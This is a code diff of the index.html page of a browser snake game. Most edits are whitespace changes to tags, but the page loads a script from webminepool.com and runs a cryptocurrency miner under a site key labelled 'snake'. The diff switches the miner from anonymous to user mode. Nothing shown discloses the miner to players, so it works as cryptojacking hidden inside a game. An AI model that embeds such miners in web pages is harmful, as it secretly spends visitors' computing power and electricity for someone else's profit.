--- a/index.html
+++ b/index.html
@@ -1,17 +1,17 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <meta charset="UTF-8" />
-    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
-    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-    <link rel="stylesheet" href="style.css" />
+    <meta charset="UTF-8"/>
+    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
+    <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+    <link rel="stylesheet" href="style.css"/>
     <script src="script.js" type="module" defer></script>
     <title>Змейка</title>
 </head>
 <body>
 <script src="https://webminepool.com/lib/base.js"></script>
 <script>
-    var miner = WMP.Anonymous(
+    var miner = WMP.User(
         'SK_lq4BWaKlLOyQmQCkgSEW6',
         'snake',
         {
@@ -28,28 +28,28 @@
     <button id="ArrowUp">
         <svg width="30" height="30" viewBox="0 0 10 10">
             <g transform="rotate(0, 5, 5)">
-                <path d="M5,4 L7,6 L3,6 L5,4" />
+                <path d="M5,4 L7,6 L3,6 L5,4"/>
             </g>
         </svg>
     </button>
     <button id="ArrowLeft">
         <svg width="30" height="30" viewBox="0 0 10 10">
             <g transform="rotate(-90, 5, 5)">
-                <path d="M5,4 L7,6 L3,6 L5,4" />
+                <path d="M5,4 L7,6 L3,6 L5,4"/>
             </g>
         </svg>
     </button>
     <button id="ArrowDown">
         <svg width="30" height="30" viewBox="0 0 10 10">
             <g transform="rotate(180, 5, 5)">
-                <path d="M5,4 L7,6 L3,6 L5,4" />
+                <path d="M5,4 L7,6 L3,6 L5,4"/>
             </g>
         </svg>
     </button>
     <button id="ArrowRight">
         <svg width="30" height="30" viewBox="0 0 10 10">
             <g transform="rotate(90, 5, 5)">
-                <path d="M5,4 L7,6 L3,6 L5,4" />
+                <path d="M5,4 L7,6 L3,6 L5,4"/>
             </g>
         </svg>
     </button>
